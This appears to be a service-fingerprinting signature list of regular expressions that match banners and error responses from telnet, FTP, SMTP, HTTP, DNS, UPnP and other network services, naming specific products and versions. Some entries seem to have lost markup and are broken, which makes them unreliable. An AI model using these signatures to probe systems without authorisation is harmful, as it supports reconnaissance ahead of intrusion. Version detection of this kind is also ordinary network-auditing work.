+\x01\0\0\0 +SSTP/([\d.]+) 400 Bad Request\r\n\r\n\0 +\x01\0\0\0z\0\0\x003,DBServer,\d+,Restarts,\d+,\d+,UpTime,\d+,\d+,MediaServer +\xff\xfb\x03\xff\xfb\x01 +\xff\xfb\x01\xff\xfb\x03\r\nUser:\r\n\r\nUser:\r\n\r\nUser: +514 Authentication required\.\r\n +login: Password: Login incorrect\. +login: uucpd: \d+-\d+ The user is not known\.\n +%rwhois V-[\w:.-]+ ([-\w_.]+) \(by Network Solutions, Inc\. V-([\d.]+)\)\n +% No entries found for the selected source\(s\)\.\n +128 System Incompatible Windows Communicator client or server version\r\n128 System Incompatible Windows Communicator client or server version\r\n +\x02\x01 +SDPACK +\xff\xfe\x01\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1f\xff\xfb\x03\xff\xfb\x01\r\nAccount Name: \r\nPassword: \r\nThis copy of the Ataman Telnetd Server is registered as licensed to:\r\n\t(.+)\r\n\r\nLogin failed: unknown user name, password or privilege incorrect\.\r\n +\xff\xfb\x01\xff\xfb\x03\r\n\r\nLogin: \r\n\r\nYou must supply a username\r\n\r\nLogin: \r\n\r\nYou must supply a username\r\n\r\nLogin: +\r\n\r\nThis is a FirstClass system, from Open Text Corporation\.\r\n\r\n\r\nFirstClass is an e-mail and conferencing system with a graphical user interface\.\r\n\r\n\r\nThe Command Line Interface is not available on this sy +\xff\xfb\x01\r\nPassword:\r\nLogged in as guest\r\n +\xff\xfb\x01Login: \r\nLogin: \r\nLogin: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\nuser: \r\npassword: \r\n\r\nuser: +\xff\xfb\x01\n\r-> \n\r-> \n\r-> +bad password\r\n +\xff\xfd\"\xff\xfb\x01SSE version ([\d.]+)\r\nCopyright [\d, ]+ by Motorola\r\nUsername: +\xff\xfb\x01Password\? \r\n500 Configuration error\. Disconnecting!\n +\xff\xfb\x01\r\n\r\nlogin: \r\n\r\n\r\r\npassword: +\xff\xfb\x01\xff\xfb\x03\nTOSHIBA Maintenance Shell\. \n\rUser access verification\.\n\rlogin: +\r\nPress return:\*\*\*\*\r\nEnter Password: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\r\0\n\r\0\n\r\0\n\r\0\n- NetQue AppleTalk/NetWare/TCP/LAT Printer Server +\r\n\r\nUser Access Verification\r\n\r\nPassword: \r\nPassword: \r\nPassword: \r\n% Bad passwords\r\n +\xff\xfb\x01\xff\xfe\"\xff\xfe\0\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1f\r\n\r\n\r\nlogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nRead /disclaimer\.txt and have fun with yadi on your Nokia D-BOX2 - Kernel ([-\w_.]+) \( +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nPhilips D-BOX2 - Kernel ([\w._-]+) \( +\xff\xfb\x01\n\rLogin: \n\r\n\r\n\rLogin: \n\rLogin: + 105 Access denied\.\r\n 105 Access denied\.\r\n 105 Access denied\.\r\n 105 Access denied\.\r\n +User Name: \r\r\nPassword: \r\r\nRemote MAC address: +\xff\xfb\x01\r\nAP11G login: \r\n\r\nPassword: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[2J\x1b\[H \n\r\0\x1b\[H\x1b\[JPASSaPORT CS-(\d+) SW V([-\w_.]+) , HW V([-\w_.]+)\r\n\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfb\x1fError2 negotiated with client \d+ and get 1 char is a a d\. \n\r\n\r\*+\n\r\*\* +\*\*\n\r\*\* IP Phone firmware +V([\w._-]+) +\xff\xfd\0\xff\xfd\x03\xff\xfb\0\xff\xfb\x03\xff\xfb\x01\x03\x04\r\nPassword: \r\n\n\rComtrol DeviceMaster RTS ModelID: (\d+) \n\r\rNS-Link ([\w._-]+) \n\rBuilt: .*\n\rIP Addr: [\d.]+ Mask: [\d.]+ Gateway: [\d.]+ \n\rMAC Addr: ([\w ]+) \n\r\n\r\r\n\rdm> \r\nInvalid Command\r\n\rdm> +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfd\x18\r\0\r\nPassword: \r\nPassword incorrect\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03AH4222\r\nLogin: \r\n\r\nPassword: +\xff\xfe\x01\xff\xfb\x01\xff\xfc\"\xff\xfd\x1flogin: \r\nlogin: \r\nlogin: +\x1b\[24;1HUsername: \x1b\[\?25h\x1b\[24;1H\x1b\[\?25h\x1b\[24;11H\x1b\[24;11H\x1b\[\?25h\x1b\[24;11H\x1b\[24;1H\r\n\r\x1b\[\?25h\x1b\[24;11H\xff\xfd\x18\xff\xfb\x01\x1b\[2J\x1b\[\?7l\x1b\[3;23r\x1b\[\?6l\x1b\[1;1H\x1b\[\?25l\x1b\[1;1HProCurve (\w+) Switch (\w+)\r\n\rSoftware revision ([\w.]+)\r\n +\xff\xfb\x01\xff\xfb\x03\r\nWelcome to IFBD-HE05/06 TELNET Utility\.\r\nCopyright\(C\) 2005 Star Micronics co\., Ltd\.\r\n\r\n<< Connected Device >>\r\n Device Model: (\w+) \(STR_T-001\)\r\n NIC Product : IFBD-HE05/06\r\n MAC Address : ([0-9A-F:]+)\r\n\r\n\r \r\nlogin: \r\n +\xff\xfb\x01\xff\xfb\x03\nLANIER Maintenance Shell\. \n\rUser access verification\.\n\rlogin: +\xff\xfb\x01\r\nUser Name : \r\nUser Name : \r\nUser Name : +\xff\xfb\x01\xff\xfb\x03\r\n\r\nWelcome to VIP-X ([\w._-]+) from [\w._-]+\r\nTLS invalid record length\r\n\r\n\r\n\r\ninvalid username\r\n\r\nTLS version 0300 not supported\r\nenter username -> +\0\0\+\x04\0\0\0@TransBase Multiplexer error report:\nIllegal request + 501 Not Implemented\r\n.*Server: (RT-\w+) UPnP/([\w.]+) MiniUPnPd/([\w.]+)\r\n + 501 Not Implemented\r\n.*Server: DrayTek/Vigor([\w._-]+) UPnP/([\w.]+) miniupnpd/([\w.]+)\r\n +HTTP/1\.1 501 Not Implemented\r\nConnection: close\r\nContent-type: text/html\r\n\r\n501 Not Implemented

Not Implemented

The HTTP Method is not implemented by this server\.\r\n + 501 Not Implemented\r\n.*Server: Linux Mips ([\w._-]+) UPnP/([\w.]+) MiniUPnPd/([\w.]+)\r\n +HTTP/1\.1 400 Bad Request\r\nServer: Symbian/([\w._-]+) UPnP/([\d.]+)\r\nContent-Length: 151\r\n\r\n\n\n400 Bad Request\n\n

Bad Request

\n
\n +HTTP/1\.1 501 Not Implemented\r\nContent-Type: text/html\r\nConnection: close\r\nContent-Length: 149\r\nServer: Linux/([\w._-]+) DLNADOC/([\w._-]+) UPnP/([\w._-]+) MiniDLNA/([\w._-]+)\r\n +0\x82\x01\n\x02\x82\x01\x01\0 +HTTP/1\.0 400 Bad Request\r\nExpires: .*\r\nContent-Type: text/html\r\n\r\n\nBad formed request or url\n +\xff\xff\xfb& +Status: 400 Bad Request\r\nServlet-Error: Malformed data sent to JServ\r\n\r\n +sh-2\.05b\ +WTAM/1\.0 401 Unrecognized Command\n\n +Command Shell\r\n\r\n% \r\n% +201- connected\r\n407- unknown command\r\n +HELLO XBOX! +ZBXD\x01\x10\0\0\0\0\0\0\0ZBX_NOTSUPPORTED +\*\*\x18B0100000023be50\r\x8a\x11 +<\?xml version=\"1\.0\"\?>\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n +(HTTP/1\.0) 200 OK\r\nServer: Kerio Personal Firewall\r\n +\xf6\xff\xff\xff\x10\0\0\0\0\0\0\0\0\0\0\0 +:[-\w_.]+ 451 GET :\r\n +\n\nDirectory /\n\n\n\n

Directory listing of /

+Nice try\.\.\.\r\n +HTTP/1\.1 401 Unauthorized\r\n.*WWW-Authenticate: negotiate \r\nWWW-Authenticate: digest nonce=\"\d+\", realm=\"/Search\", algorithm=\"md5\"\r\n.*Server: Twisted/([\w._-]+) TwistedWeb/([\w._-]+)\r\n +HTTP/1\.0 302 Found\r\nLocation: http://www\.distributed\.net/\r\n\r\n +\0\x79\xd0\x02\xff\xff\0\x73\x12\x4c\0\x06\x11\x49\0\x08\0\x4e\x11S\0\xd3 +=\0\0\0 +Login name: / \t\t\tIn real life: \?\?\?\r\n\r\nLogin name: GET \t\t\tIn real life: \?\?\?\r\n\r\nLogin name: HTTP/1\.0 \t\t\tIn real life: \?\?\?\r\n +Login name: GET \t\t\tIn real life: \?\?\?\r\n + +-;;=\n +\.;M####\+\n +User not found\r\n +EMail : [-\w_.]+@([-\w_.]+)\r\n Real Name : \?\?\r\n Home Page : \?\?\r\n +Login name: HTTP/1\.0 In real life: \?\?\?\r\n +3That item is not currently available\.\r\n +\0\0\0\0/\x20HT +HTTP/1\.1 302 Moved\r\nContent-type: text/html\r\nConnection: close\r\nLocation: /1[012]\d{8}/l\r\n\r\n

Document +HTTP/1\.[01] \d\d\d .*\r\nServer: Xitami\r\n +HTTP/1\.[01] \d\d\d .*\r\nServer: JRun Web Server\r\n +HTTP/1\.1 403 Forbidden\r\nServer: Web Server\r\n\r\n +HTTP/1\.1 301 Moved Permanently\r\nServer: Web Server\r\nLocation: .*\r\nContent-Type: text/html\r\nContent-Length: \d+\r\n\r\nMovedMoved\r\n +HTTP/1\.1 200 OK\r\nContent-Type: text/html\r\n\r\n.*MiniShare\r\n.*Total: (\d+) files([^<]+) +HTTP/1\.0 \d\d\d .*\r\nServer: Quantum Corporation\./([\d.]+)\r\n +HTTP/1\.0 200 \(OK\) \r\nPragma: No-Cache\r\nCache-Control: no-cache\r\nDate: .*\r\nServer: HTTP Server\r\n.*Copyright \d+, \d+ Nortel Networks\. +HTTP/1\.1 \d\d\d .*\r\nServer: Jigsaw/([\w.-]+)\r\n +HTTP/1\.1 \d\d\d .*\r\nDate: .*\r\nServer: ENI-Web/R([\d_]+)\r\nWWW-Authenticate: Basic realm=\"standard@Modem\"\r\n\r\n +HTTP/1\.0 \d\d\d .*\r\nPragma: no-cach\r\nContent-Type: text/html; charset=windows-1251\r\n\r\n\r\n\r\nUserGate report area\r\n +HTTP/1\.0 200 Ok\r\nServer: httpd\r\nDate: .*\nWL700g Web Manager +HTTP/1\.0 200 OK\r\nConnection: close\r\nContent-Type: text/html; charset=iso-8859-1\r\n\r\n\r\n\r\n\r\n8 Port Gigabit Switch\r\n +HTTP/1\.0 303 Redirecting\r\nServer: httpd/[\d.]+ Python/([\d.]+)\r\n.*Cache-Control: no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0\r\n.*: Redirecting\n\n

For more printserver info please open the [\d.]+ home page +:Default-Chat-Community 421 \* GET :Unknown command\r\n +:([-\w_.]+) 451 :You have not registered your connection\r\n +<\?xml version='1\.0'\?> +Invalid XML +Invalid XML +<\?xml version='1\.0' encoding='UTF-8'\?>\n\n +JAMES Remote Administration Tool ([\d.]+)\nPlease enter your login and password\nLogin id:\n +\0\0\0.~\x81.0\x81..\x03\x02\x01\x05.\x03\x02\x01\x1e.\x11\x18\x0f +ERR unknown_command Unknown\+server\+command\r\n +..\x0a\0x\x01 +ERROR\n +1INVALID REQUEST +\xfb\xff\xfe\xff\xfb\xff\xfe\xff\xfb\xff\xfe\xff| p|Novell NetWare/IP +SOURCETABLE 200 OK\r\nServer: NTRIP Caster ([\w._-]+)/([\w._-]+)\r\nContent-Type: text/plain\r\n +\xe3\r\n\r\n\0\x01\0.\0vInvalid protocol verification, illegal ORMI request or request performed with an incompatible version of this protocol +\xe3\r\n\r\n\0\x01\0\x03\x0b\0vInvalid protocol verification, illegal ORMI request or request performed with an incompatible version of this protocol +-ERR \[SYS/PERM\] Fatal error: tls_start_servertls\(\) failed\r\n +-ERR Fatal error: pop3s: required OpenSSL options not present\r\n +EFATAL: invalid length of startup packet\n\0 +action=dunno\n\n +-ERR wrong number of arguments for 'get' command\r\n +0 serverclose 0\n +HTTP/1\.0 401 Unauthorized\r\nConnection: close\r\nContent-Type: text/html; charset=ISO-8859-1\r\nWWW-Authenticate: Basic realm=\"server\r\nContent-Length: 166\r\n +HTTP/1\.0 200 OK\r\nServer: SetiQueue/(\d+)\r\n +ICY \d\d\d .*SHOUTcast Distributed Network Audio Server/posix.v([\d.]+) +HTTP/1\.1 405 Method Not Allowed\r\nDate:0000-01-01T18:54:43\r\nContent-Type: application/soap\+xml; charset=\"utf-8\"\r\n\r\n +\xff\xfb\x03\xff\xfb\x01\xff\xfbi\r\n\tWelcome to Magicunix's TCP Server\.\r\n\r\n\r\nLogin: P/1\.0\r\nPassword: \r\nLogin incorrect\r\nLogin: +\xff\xfb\x01\xff\xfb\x03telnet@CER(\w+)>GET / HTTP/1\.0\r\nInvalid input -> GET / HTTP/1\.0\r\nType \? for a list\r\n +HTTP/1\.0 503 Directory busy, try again later\r\n\r\n +HTTP/1\.1 \d\d\d .*\r\nWWW-Authenticate: Basic realm=\"([\w._-]+)\"\nEXT:\r\nServer: *Linux/([\w._-]+), UPnP/([\w._-]+), pvConnect UPnP SDK/([\w._-]+)\r\n +HTTP/1\.1 200 OK\r\nDate: .*\r\nServer: Linux/2\.x UPnP/([\w._-]+) Avtech/([\w._-]+)\r\nConnection: close\r\nLast-Modified: .*\xb2\xe8\xbe\x1c\xb2\xe8\xbe\x38\x62\x03\r\n +login: Login incorrect\. +HTTP/1\.0 404 Not Found\r\nDate: .*\r\nServer: ByllSoftware Gurda/([\d.]+)\r\n +HTTP/1\.0 401 Unauthorized\r\n\r\n

401 - Authorization Failed

\0 +\n\r\nJava Whois Server ([\w._-]+) \(c\) \d+ - \d+ Klaus Zerwes zero-sys\.net\r\n\n +\x01\0\0\0\x02\0\0 + +HTTP/1\.1 200 OK\r\nServer: DavMail Gateway ([\w._-]+)\r\nDAV: 1, calendar-access, calendar-schedule, calendarserver-private-events, addressbook\r\n +HTTP/1\.0 400 Bad Request\r\nServer: Web Sharing\r\nContent-type: text/html\r\n\r\n400 Bad RequestThe URL you requested could not be understood by the server\. Do not include double slashes or colon characters in the URL\.\r\n\r\n +HTTP/1\.0 \d\d\d.*\r\nServer: B[iI][gG]-?IP\r\n +\x10\x1a\x0b\x00\x60\x4d +HTTP/1\.1 406 Not Acceptable\r\nCache-Control: no-cache\r\nPragma: no-cache\r\nContent-Type: text/html; charset=utf-8\r\nConnection: close\r\nContent-Length: 616\r\n\r\n\nRequest Error +\r\n400 Bad Request\r\n\r\n

400 Bad Request

\r\n
nginx
\r\n\r\n\r\n +RTSP/1\.0 400 Bad Request\r\nServer: PanWeb Server/([\w._-]+)\r\n.*Keep-Alive: timeout=60, max=2000\r\nContent-Type: text/html\r\nContent-length: 130\r\n\r\nDocument Error: Bad Request +RTSP/1\.0 403 Forbidden: Proxy not licensed\r\nSession: \w+\r\n\r\n +RTSP/1\.0 400 Bad request\nContent-type: text/html\n\n +HTTP/1\.1 400 Bad Request\r\nDate: .*\r\nServer: Unknown/0\.0 UPnP/([\d.]+) Virata-EmWeb/([-.\w]+)\r\n +(?:p9sk1@[\w._-]+ )*p9sk1@([\w._-]+)\0/bin/exportfs: auth_proxy: auth_proxy rpc write: : invalid argument\n +<\?xml version=\"1\.0\" encoding=\"UTF-8\"\?>\n\n\n \n com\.kapowtech\.robosuite\.api\.java\.rql\.RQLProtocolException: Invalid byte 1 of 1-byte UTF-8 sequence\. +\0\0\0\0\0\x84\0\x10\x7c\x9f\xfb\0\0\0\0\0 +\x04\x01\0C..\0\0\xaa\0\0\0/\x0f\xa2\x01\x0e.. Login failed\r\n\x14Microsoft SQL Server\0\0\0\xfd\0\xfd\0\0\0\0\0\x02 +\x01Permission denied\.\n +\xde\xad\xbe\xef\x04\0\xff\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x1fem\.requestparserparser\.InvError +\x16\x15\x16\x16\x16\x12XW\] +\x07version\x04bind\0\0\x10\0.\xc0\x0c\0\x10\0\x01\0\0\0\x05\0..Served by PowerDNS - http://www\.powerdns\.com +\0\x06\x81\x80\0\x01\0\x01\0\0\0\0\x07version\x04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03.......PowerDNS Recursor ([\w._-]+) (\Id: pdns_recursor\.cc .*?\) +\0\x06\x81\x80\0\x01\0\x01\0\0\0\0\x07version\x04bind\0\0\x10\0\x03\xc0\x0c\0\x01\0\x01\0\0\0\x03\0\x04.... +\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0\x10\0\x03 +..\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0...[\w._-]+-RedHat-([\w._-]+\.el5_[\w._-]+)\xc0\x0c\0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c +\0\x1e\0\x06\x81\x84\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0\x10\0\x03 +..*\x07version\x04bind.*Incognito DNS \w+ ([\d.]+) \( +\0\x1e\0\x06\x81\x85\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0\x10\0\x03 +\x01Login incorrect\.\n +\x01rexecd: Login incorrect.?\n +\x01rexecd: [-\d]+ Connexion incorrecte\.\n +\x01INTERnet ACP AUXS failure Status = %LOGIN-F-NOSUCHUSER\r\n\0 +\0\x0c\0\x06\x81\x04\0\0\0\0\0\0\0\0 +\0\x0c\0\x06\x80\x05\0\0\0\0\0\0\0\0 +\0\x0c\0\x06\x81\x84\0\0\0\0\0\0\0\0 +\0\x86\x05\x02\0\0\x07\?\0\x01\x01@\0\0\0\0\0\0\0\0\0H\Id: //ral_depot/products/IxChariot6\.50\.24/ENDPOINT/CODE/client\.c#3 \\0\0\0\x1a\x7f\0\x02\0\x0ce1_thread\0\0\x18main_process_incoming\0 +\0\^A\^@\^@\^@\^@\^@\^@\^Gversion\^Dbind\^@\^@\^P\^@\r\n-> shell restarted\.\r\n\r\n-> +\0\r\n-> trcStack aborted: error in top frame\r\ntShell restarted\.\r\n\r\n-> !1 echo_recv: -1\.\r\n +\x01krshd: Echec de l'authentification Kerberos\.\r\n\0 +\0\x1e\0\x06\0\t\0\0 +\0\x11Invalid command\n\0\0\0 +\x01krlogind: Echec de l'authentification Kerberos\.\r\n\0 +\x01in\.utrcmdd \(remote\): protocol error \(1\)\n\0 +1\0 +\0&\xeb\xefTQM\xee\[B +\0(?:\x03\x58\0)?\x6a\x01\0\0\0\0Your client is too old\. To use this server, please upgrade your client to a Freeciv 2\.2 or later\.\0\0\0\x03\0\0\x03\x01 +\xe3\r\n\r\n\0\x01\0.\0vInvalid protocol verification, illegal ORMI request or request performed with an incompatible version of this protocol +.*\Id: //ral_depot/products/current/ENDPOINT/CODE/client\.c +\x04\x01\0\(\0\0\0\0\xaa\0\x14\0\0\x0f\xa2\x01\x0eLogin failed\.\n\xfd\0\x02\0\x02\0\0\0\0 +\0\x1e\x02\x06\x01\0\0\0\0\0\0\xf1\0 +HTTP/1\.0 414 Request-URI Too Long\r\nServer: Linux/([\w._-]+) UPnP/([\w._-]+) fbxigdd/([\w._-]+)\r\nConnection: close\r\n\r\n +\0\x0c\0\0\x90\x04\0\0\0\0\0\0\0\0 +\0\x0c\0\0\x90\x84\0\0\0\0\0\0\0\0 +\0\0s\0\0\0\0\0 +\xff\0\x0e\0P\0r\0o\0t\0o\0c\0o\0l\0 \0e\0r\0r\0o\0r +\d{1,2}:\d\d:\d\d \d{1,2}/\d\d/\d{4}\n +220 ([\w_.-]+) ESMTP\r\n501 ehlo requires domain/address - see RFC-2821 4\.1\.1\.1\r\n +220 ([\w_.-]+) ready\r\n250-[\w_.-]+\r\n250 AUTH LOGIN PLAIN \r\n +cvs \[pserver aborted\]: bad auth protocol start: HELP\r\n\n? +cvs \[server aborted\]: bad auth protocol start: HELP\r\n +cvs \[server aborted\]: bad auth protocol start: HELP\r\nerror \n +cvs-pserver \[pserver aborted\]: bad auth protocol start: HELP\r\n\n +HELP\r\n +220 .*\r\n214-The following commands are recognized \(\* =>'s unimplemented\):\r\n CWD XCWD CDUP XCUP SMNT\* QUIT PORT PASV \r\n EPRT EPSV ALLO\* RNFR RNTO DELE MDTM RMD \r\n XRMD MKD XMKD PWD XPWD SIZE SYST HELP \r\n NOOP FEAT OPTS AUTH\*? CCC\* CONF\* ENC\* MIC\* \r\n PBSZ\*? PROT\*? TYPE STRU MODE RETR STOR STOU \r\n +220 FTP server ready\.\r\n214- The following commands are recognized \(\* =>'s unimplemented\)\.\r\n USER PORT TYPE MLFL\* MRCP\* DELE SYST RMD STOU \r\n PASS LPRT STRU MAIL\* ALLO CWD STAT XRMD SIZE \r\n ACCT\* EPRT MODE MSND\* REST XCWD HELP PWD MDTM \r\n SMNT\* PASV RETR MSOM\* RNFR LIST NOOP XPWD \r\n REIN\* LPSV STOR MSAM\* RNTO NLST MKD CDUP \r\n QUIT EPSV APPE MRSQ\* ABOR SITE XMKD XCUP \r\n214 End\.\r\n +220 ([-\w_.]+) FTP server \(UNIX_SV ([\d.]+)\) ready\.\r\n214-The following commands are recognized \(\* =>'s unimplemented\)\.\r\n USER PORT STOR MSAM\* RNTO NLST MKD CDUP \r\n PASS PASV APPE MRSQ\* ABOR SITE XMKD XCUP \r\n ACCT\* TYPE MLFL\* MRCP\* DELE SYST RMD STOU \r\n SMNT\* STRU MAIL\* ALLO CWD STAT XRMD SIZE \r\n REIN\* MODE MSND\* REST XCWD HELP PWD MDTM \r\n QUIT RETR MSOM\* RNFR LIST NOOP XPWD \r\n +220 FTP server ready\r\n214-The following commands are recognized:\r\nHELP\tUSER\tPASS\tQUIT\tLIST\tNLST\r\nRETR\tSTOR\tCWD\tTYPE\tPORT\tPWD\r\nSTRU\tMODE\tALLO\tACCT\tPASV\tNOOP\r\nDELE\tEPRT\tEPSV\r\n214 End of command list\.\r\n| p|TopLayer/Alcatel ftpd +220 Connection established\.\r\n214-The following commands are supported:\r\n\tUSER\tPORT\tTYPE\tABOR\tCWD \tLIST\r\n +220 FTP Server Ready\r\n.*\r\n214 Direct comments to psp@amoks\.com\.\r\n +220 FTP server ready\r\n211 HELP text\r\n +220 Connection established\.\r\n214-The following commands are supported\.\r\n USER PORT TYPE ABOR CWD LIST\r\n PASS PASV STRU PWD XCWD NLST\r\n QUIT STOR MODE XPWD NOOP HELP\r\n214 End of HELP\r\n +220 Welcome to connection\.\r\n214 FTP Server Help\.\r\n HUMAX PVR FTP Server\. \r\n214 End\r\n +(?:220-.*\r\n)?220 .*\r\n530 Please login with USER and PASS\.\r\n +220 Service Ready\r\n502 Command Not implemented\r\n +HTTP/1\.1 400 Parse error: Could not parse request line \(split\.length=1\): HELP\r\n +0 , 0 : ERROR : UNKNOWN-ERROR\r\n +HELP : USERID : UNIX : trilluser\r\n +\d+, \d+ : USERID : UNIX : [-.@\w]+\r\n +0, 0 : ERROR : UNKNOWN-ERROR +:([-\w_.]+) 451 \* :You have not registered\r\n +:([-\w_.]+) 451 \* :Register first\.\r\n +NOTICE AUTH :\*\*\* Checking Ident\r\n:([-\w_.]+) 451 \* :Register first\.\r\n +:([-\w_.]+) 290 :\.-----------------=#\[ euIRCd HelpSystem \]#=----------------\.\n +200 NNTP server ready\r\n100 Avaliable commands:\r\nARTICLE\r\nAUTHINFO\r\nBODY\r\nGROUP\r\nHEAD\r\nHELP\r\nIHAVE\r\nLAST\r\nLIST\r\nNEWGROUPS\r\nNEWNEWS\r\nNEXT\r\nPOST\r\nQUIT\r\nSLAVE\r\nSTAT\r\nXHDR\r\n\.\r\n| p|Hamster Playground/Kerio nntpd +\x01Socket \d+ received unknown command 0x48 with arguments ELP +false;error while receiving message from client\n +220 ([-.+\w]+) Generic SMTP handler\r\n214 Help not supported by this implementation\r\n +220.*?\n214-Commands supported:\r\n214- HELO EHLO MAIL RCPT DATA(?: ETRN)?(?: AUTH)?\r\n214 NOOP QUIT RSET HELP \r\n +220 ([-.\w]+) SMTP version 1\.00;\r\n214 We strongly advise you to study (?:of )?the RFC ?821\.\.\.\r\n +220 ([-\w_.]+) ESMTP\r\n402 Error: command not implemented\r\n +220 smtpd\r\n502 [\d.]+ Error: command not recognized\r\n +220 E?SMTP [^\r\n]*\r\n502 5\.5\.2 Error: command not recognized\r\n +220 ([-\w_.]+) ESMTP \w+\r\n +220 (\S+) E?SMTP Sendmail; +220.*214 SMTP server comments and bug reports to: \ +220.*500 MessageWall: Unrecognized command +220 .*\r\n214-Commands Supported:\r\n214-HELO EHLO AUTH HELP QUIT MAIL NOOP RSET RCPT DATA ETRN VRFY STARTTLS\r\n214-Copyright \(c\) 1995-200\d, Stalker Software, Inc\.\r\n +220 .* ESMTP\r\n214-Gentoo Linux qmail-([-\w.]+)\r\n214 qmail home page: http://pobox\.com/~djb/qmail\.html\r\n +220 ([-\w_.]+) ESMTP\r\n214-The following commands are recognized\r\n214-\tauth\tdata\tehlo\t +220 \[?([-\w_.]+)\]? ESMTP server ready\.\r\n214-Recognized SMTP commands are:\r\n214- HELO EHLO MAIL RCPT DATA RSET\r\n214- AUTH NOOP QUIT HELP VRFY SOML\r\n214 Mail server account is '([-\w_.]+)'\.\r\n| p|Mercury/32 smtpd +220 ([-\w_.]+) Server ESMTP ready at .*\r\n241-\r\n +220 ([-\w_.]+) ESMTP \r\n +220 ([-\w_.]+)\r\n214-Commands supported:\r\n214 AUTH STARTTLS HELO EHLO MAIL RCPT DATA NOOP QUIT RSET HELP\r\n +220 ([-\w_.]+) MailShield SMTP\r\n +220-([-\w_.]+) ESMTP\r\n220-MagicMail Daemon with Built-In Anti-Spam\r\n220 See http://www\.linuxmagic\.com for info\r\n214 qmail home page: http://cr\.yp\.to/qmail\.html, LinuxMagic Support http://www\.linuxmagic\.com\r\n +220 ESMTP Service ready at .*\r\n214-Enter one of the following commands:\r\n214-HELO EHLO MAIL RCPT DATA RSET NOOP QUIT\r\n214 HELP \r\n +220 ([-\w_.]+) ESMTP MTA\r\n214-This is Sendmail version AIX([\d.]+)/([\w.]+)\r\n +220 Service ESMTP Ready\r\n214-This is Sendmail version ([\d.]+) \((P[-\w_.]+)\)\r\n.*future enhancements, contact your HP representative +220 ([-\w_.]+)\r\n502 Command not implemented\r\n +220 ([-\w_.]+) ESMTP[^\r\n]*\r\n211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY\r\n\r\n +220 ([-\w_.]+) - Ready at .*\r\n214-Commands:\r\n214- HELO MAIL RCPT DATA RSET NOOP QUIT\r\n214- For more info use 'HELP '\.\r\n214 End of HELP info\r\n +220 ESMTP Service ready\r\n500 Command unrecognized\r\n +220 ([-\w_.]+) ESMTP [-\w_.]+ Mail Server ([\d.]+); .*\r\n214-2\.0\.0 This is [-\w_.]+ Mail Server [-\w_.]+\r\n214-2\.0\.0 Topics:\r\n +220 WebMail ESMTP\r\n502 negative vibes\r\n +220 Welcome to the mail server\.\r\n211 DATA EXPN HELO MAIL NOOP QUIT RCPT RSET SAML SEND SOML TURN VRFY\r\n +220 .*\r\n214-This is ArGoSoft Mail Server Pro for WinNT/2000/XP, Version [-\w_.]+ \(([-\w_.]+)\)\r\n +220 ([-\w_.]+) Service ready\.\r\n214- Valid commands are:\r\n214- HELO MAIL RCPT DATA RSET QUIT NOOP\r\n214- HELP VRFY\r\n214- Commands not valid are:\r\n214- SEND SOML SAML TURN\r\n214- Mail forwarding handled by this server\.\r\n| p|i5/OS V5R4M0 or OS/400 smtpd +220 ([-\w_.]+) ESMTP server is ready\r\n.*214-Copyright \(c\) 1995-2004, Stalker Software, Inc\.\r\n +220 ([-\w_.]+) ESMTP\r\n211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY\r\n +220 ([-\w_.]+) ESMTP Generic Ready\r\n502 Command not implemented\.\r\n +220 ([\w_.-]+) ESMTP\r\n214-Run 'info anubis' or visit http://www\.gnu\.org/software/anubis/manual/\r\n214 End of HELP info\r\n +220 SMTP service ready\r\n214-Commands:\r\n214-\tDATA\tRCPT\tMAIL\tQUIT\tRSET\r\n214 \tHELO\tVRFY\tEXPN\tHELP\tNOOP\r\n +220 ready\r\n214-Commands:\r\n214- HELO MAIL RCPT DATA\r\n214- RSET NOOP QUIT HELP\r\n214- VRFY EXPN\r\n214-For more info use HELP \r\n214 End of HELP info\r\n +220 ([-\w_.]+) SMTP; .*\r\n500 Syntax error, command unrecognized\.\r\n +220 ([-\w_.]+) SMTP; .* \+\d{4}\r\n500 Syntax error, command unrecognized\r\n +220 ([-\w_.]+) ESMTP smtprelay service ready\.\r\n214-This is smtprelay\r\n214-Topics: +220 SMTP ESMTP ready at .*0\r\n214-\r\n214 End of HELP info\r\n +220 ([-\w_.]+)\r\n214-HELO domain\r\n214-EHLO domain\r\n214-QUIT\r\n214-MAIL FROM: \[options\]\r\n +220 ([-\w_.]+) ESMTP Ready\r\n211 Help:->Supported Commands: HELO,EHLO,QUIT,HELP,RCPT,MAIL,DATA,RSET,NOOP\r\n +220 ([-\w_.]+) SMTP Relay Service ready\r\n500 Syntax error, command unrecognized\r\n +503 Synchronization error\r\n +(sgi_[-.\w]+\r\n(?:[-.\w]+\r\n)*) +Welcome to Vulnerable Server! Enter HELP for help\.\nValid Commands:\nHELP\nSTATS \[stat_value\]\nRTIME \[rtime_value\]\nLTIME \[ltime_value\]\nSRUN \[srun_value\]\nTRUN \[trun_value\]\nGMON \[gmon_value\]\nGDOG \[gdog_value\]\nKSTET \[kstet_value\]\nGTER \[gter_value\]\nHTER \[hter_value\]\nLTER \[lter_value\]\nKSTAN \[lstan_value\]\nEXIT\n +Commands: HELP VER GET LIST SET INSTCMD LOGIN LOGOUT USERNAME PASSWORD STARTTLS\n 